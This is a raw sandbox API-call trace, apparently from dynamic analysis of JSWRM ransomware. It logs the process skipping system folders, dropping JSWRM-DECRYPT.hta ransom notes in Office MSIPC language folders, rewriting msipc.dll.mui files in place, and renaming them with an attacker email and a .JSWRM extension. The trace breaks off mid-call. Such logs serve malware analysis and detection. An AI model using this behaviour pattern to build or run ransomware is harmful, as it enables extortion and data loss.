[0136.348] lstrcmpiW (lpString1="et", lpString2="...") returned 1 [0136.348] lstrcmpiW (lpString1="et", lpString2="windows") returned -1 [0136.348] lstrcmpiW (lpString1="et", lpString2="recovery") returned -1 [0136.348] lstrcmpiW (lpString1="et", lpString2="perflogs") returned -1 [0136.348] lstrcmpiW (lpString1="et", lpString2="documents and settings") returned 1 [0136.348] lstrcmpiW (lpString1="et", lpString2="$RECYCLE.BIN") returned 1 [0136.348] lstrcmpiW (lpString1="et", lpString2="system volume information") returned -1 [0136.348] lstrcmpiW (lpString1="et", lpString2="msocache") returned -1 [0136.348] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\et\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\et\\jswrm-decrypt.hta")) returned 0xffffffff [0136.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.348] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\et\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\et\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.349] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.350] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.351] CloseHandle (hObject=0x238) returned 1 [0136.351] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\et\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\et\\jswrm-decrypt.hta")) returned 0x20 [0136.351] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\et\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47ef6375, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0136.351] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.351] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47ef6375, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.351] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.351] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.351] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ef6375, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47ef6375, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47ef6375, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.351] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.351] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.351] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.351] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.351] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.351] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.351] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.351] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.351] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.351] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.352] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5098, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.352] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.352] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.352] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.352] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.352] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.352] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.352] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.352] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.352] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.352] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.352] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\et\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\et\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.353] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=20632) returned 1 [0136.353] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.353] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5090, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5090, lpOverlapped=0x0) returned 1 [0136.357] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.357] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5090, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5090, lpOverlapped=0x0) returned 1 [0136.357] CloseHandle (hObject=0x314) returned 1 [0136.357] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\et\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\et\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\et\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\et\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.358] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5098, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.358] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0136.358] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="eu", cAlternateFileName="")) returned 1 [0136.358] lstrcmpiW (lpString1="eu", lpString2=".") returned 1 [0136.358] lstrcmpiW (lpString1="eu", lpString2="..") returned 1 [0136.358] lstrcmpiW (lpString1="eu", lpString2="...") returned 1 [0136.358] lstrcmpiW (lpString1="eu", lpString2="windows") returned -1 [0136.358] lstrcmpiW (lpString1="eu", lpString2="recovery") returned -1 [0136.358] lstrcmpiW (lpString1="eu", lpString2="perflogs") returned -1 [0136.358] lstrcmpiW (lpString1="eu", lpString2="documents and settings") returned 1 [0136.358] lstrcmpiW (lpString1="eu", lpString2="$RECYCLE.BIN") returned 1 [0136.358] lstrcmpiW (lpString1="eu", lpString2="system volume information") returned -1 [0136.358] lstrcmpiW (lpString1="eu", lpString2="msocache") returned -1 [0136.358] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\eu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\eu\\jswrm-decrypt.hta")) returned 0xffffffff [0136.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\eu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\eu\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.359] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.360] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.361] CloseHandle (hObject=0x238) returned 1 [0136.361] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\eu\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\eu\\jswrm-decrypt.hta")) returned 0x20 [0136.361] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\eu\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47ef6375, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x232040 [0136.361] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.361] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47ef6375, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.361] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.361] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.361] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47ef6375, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47ef6375, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47ef6375, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.361] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.361] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.361] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5698, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.362] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.362] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.362] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.362] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.362] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.362] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.362] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.362] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.362] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.362] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\eu\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\eu\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.363] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=22168) returned 1 [0136.363] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.393] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5690, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5690, lpOverlapped=0x0) returned 1 [0136.398] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.398] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5690, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5690, lpOverlapped=0x0) returned 1 [0136.398] CloseHandle (hObject=0x314) returned 1 [0136.398] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\eu\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\eu\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\eu\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\eu\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.399] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x37869c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x37869c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x37869c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5698, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.400] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0136.400] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfc53b9f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc53b9f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc53b9f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="fi", cAlternateFileName="")) returned 1 [0136.400] lstrcmpiW (lpString1="fi", lpString2=".") returned 1 [0136.400] lstrcmpiW (lpString1="fi", lpString2="..") returned 1 [0136.400] lstrcmpiW (lpString1="fi", lpString2="...") returned 1 [0136.400] lstrcmpiW (lpString1="fi", lpString2="windows") returned -1 [0136.400] lstrcmpiW (lpString1="fi", lpString2="recovery") returned -1 [0136.400] lstrcmpiW (lpString1="fi", lpString2="perflogs") returned -1 [0136.400] lstrcmpiW (lpString1="fi", lpString2="documents and settings") returned 1 [0136.400] lstrcmpiW (lpString1="fi", lpString2="$RECYCLE.BIN") returned 1 [0136.400] lstrcmpiW (lpString1="fi", lpString2="system volume information") returned -1 [0136.400] lstrcmpiW (lpString1="fi", lpString2="msocache") returned -1 [0136.400] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\fi\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\fi\\jswrm-decrypt.hta")) returned 0xffffffff [0136.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, 